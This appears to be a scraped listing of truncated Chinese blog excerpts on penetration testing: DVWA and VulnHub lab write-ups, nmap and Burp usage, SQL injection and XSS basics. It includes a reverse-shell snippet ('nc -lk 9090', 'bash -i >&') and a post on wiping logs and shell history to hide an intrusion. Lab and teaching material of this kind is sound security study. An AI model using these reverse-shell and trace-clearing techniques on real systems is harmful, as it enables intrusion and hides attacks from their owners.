VulnHub渗透测试-Bulldog2 文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现三、漏洞利用、GetShell四、权限提升,得到Flag五、种植后门、清理痕迹渗透步骤一、主机发现、端口扫描//主机发现root@kali:~# ifconfigroot@kali:~# nmap -sn 192.168.56.1/24//端口扫描,获取服务、系统版本信息root@kali:~# nmap -sV -O 192.168.56.104//目录扫描root@kali:~# dirb http://192.168.
Linux 入侵痕迹清理技巧 文章目录01、清除history历史命令记录02、清除系统日志痕迹03、清除web入侵痕迹04、文件安全删除工具05、隐藏远程SSH登陆记录在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。01、清除history历史命令记录查看历史操作命令:查看历史操作命令:historyhistory记录文件:more ~/.bash_history第一种方式:(1)编辑history记录文件,
nmap基本使用方法 1、nmap简单扫描nmap默认发送一个ARP的PING数据包,来探测目标主机1-10000范围内所开放的所有端口命令语法: nmap <target ip address>其中:target ip address是扫描的目标主机的ip地址例子:nmap 173.22.90.10[root@docker-node4 ~]# nmap 173.22.90.10PORT STATE SERVICE22/tcp open ssh 80/tcp open http111
linux反弹shell命令解析 文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙3. 反弹shell操作步骤3.1. 在本机开启端口9090nc -lk 90903.2. 在需要被控制的机器上执行如下两种命令中的一种即可bash -i >& /
BurpSuite系列----Proxy模块(代理模块) 文章目录一、简介二、模块说明1.Intercept2.HTTP History3.WebSockets history4.Options一、简介Proxy代理模块作为BurpSuite的核心功能,拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过以恶意的方式修改浏览器的请求,Burp 代理可以用来进行攻击,如:SQL 注入,cooki
封神台SQL注入-基础靶场1-显错注入 一、显错注入Pass-01判断注入类型id=1 //有回显id=1' // No results found 判断为数字型注入判断有几列id=1 order by 3 //有回显id=1 order by 4 // No results found 判断有三列判断回显点id=1 union select 1,2,3...
sql注入中关于“--+“,“--“和“#“ 使用#号有时发现执行的sql语句中没有#号原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#将#号改成url的编码%23就可以了使用--和使用--+这里发现+号在语句中变成了空格。用来和后面的单引号分隔开,将后面的语句注释。了解原理后便知道了--无法使用的原因,是因为--与后面的单引号连接在一起,无法形成有效的mysql语句。在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合所以在注入时我们除了使用--+
如何判断是字符型注入还是数字型注入 前言通常sql 注入漏洞会被分为2种类型数值型字符型其实所有产生类型都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类型限制,而不同的数据库有不同的数据类型,不管我们怎么分常用的数据类型总是以数值和字符来进行区分的。如何区分1)数字型当输入的参数x为整型的时候,通常sql语句是这样的select * from users where id =x这种类型可以使用经典的and 1=1 and 1=2来判断url地址中输入www.xxxx.com/ccc.php?i
DVWA-JS攻击 文章目录JavaScript攻击一、Low等级二、Medium等级三、High等级Impossible等级JavaScript攻击属于Web前端安全,不存在黑盒测试的概念,直接可以对JS进行白盒代码审计。DVWA中的JavaScript攻击的场景是基于token由前端JS生成而引起的一系列问题。成功提交success,即过关一、Low等级1、漏洞分析尝试输入success,会显示invalid token生成token的源码function rot13(inp) {
DVWA-CSP绕过内容安全策略 文章目录CSP一、Low等级二、medium等级三、High等级四、Impossible等级CSP指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。CSP的实质就是白名单制度,开发人员明确告诉客户端,哪些外部资源可以加载和执行。开发者只需要提供配置,实现和执行全部由浏览器完成。启用CSP通过HTTP相应头信息的Content-Security-Policy字段通过网页标签说明script-src脚本:只信任当前域名object-src:不
渗透测试中的端口利用 文章目录端口渗透图解详解端口渗透我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞。端口渗透图解详解端口渗透文件共享端口渗透FTP服务FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。默认端口20(
DVWA-XSS(Reflected+Stored) 文章目录XSS-Reflected反射型一、各等级漏洞分析及利用XSS-Stored存储型一、各等级漏洞分析及利用XSS-Reflected反射型把用户输入的数据反射给浏览器,诱使用户点击一个恶意链接,才能攻击成功。一、各等级漏洞分析及利用Low等级,没做任何过滤直接弹medium等级,过滤掉<script>,用空替换掉大小写、过滤规则漏洞利用,使用其他标签high等级,匹配一些<script>的关键字符,进一步过滤<script>
DVWA-XSS(DOM)G 文章目录XSS的应用场景DOM型XSS一、Low等级二、Medium等级三、High等级XSS的应用场景利用XSS获得cookie重定向钓鱼网站DDOSDOM型XSS文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。一、Low等级1、漏洞分析<?php# No protections, anything goes?> 没任何保护2.漏洞利用2.1重定向<script>window.loca
04信息搜集 1、信息搜集的思路和方法思路服务器的配置信息和网站的敏感信息域名和子域名信息目标网络系统开放的端口指纹方法网络架构系统前端后端中间键知道域名后,我们需要知道目标的注册信息DNS服务器信息注册人的联系信息获取方法whois查询:kali自带或在线查询(whois.chinaz.com)备案信息查询:https://www.tianyancha.com/Dnsenum/Layer收集子域名信息寻找真实IP判断是否存在cdn。(www.17ce.com
DVWA- Weak Session IDs 弱会话ID 文章目录弱会话ID一、Low等级二、Medium等级三、High等级四、Impossible等级弱会话ID用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。一个SessionID就对应一个客户端,用户拿到session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了。但是 session id 过于简单就会容易被人伪造,根本都不需要知道用户的密码就能登录服务器了。一、Low等级1、漏洞分析&l
DVWA-SQL Injection 注入&Sqlmap 文章目录SQL注入一、Low等级二、Medium等级三、High等级四、ImpossibleSQL注入指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。一、Low等级1、漏洞分析 <?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWA-Insecure CAPTCHE 不安全的验证流程 文章目录不安全的验证流程一、Low等级二、Medium等级四、impossible等级不安全的验证流程一、Low等级1、漏洞分析if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { // Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'],
DVWA-File Upload 文件上传W 文章目录文件上传一、Low等级二、Medium等级三、High等级四、Impossible文件上传由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限一、Low等级1、漏洞分析 <?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT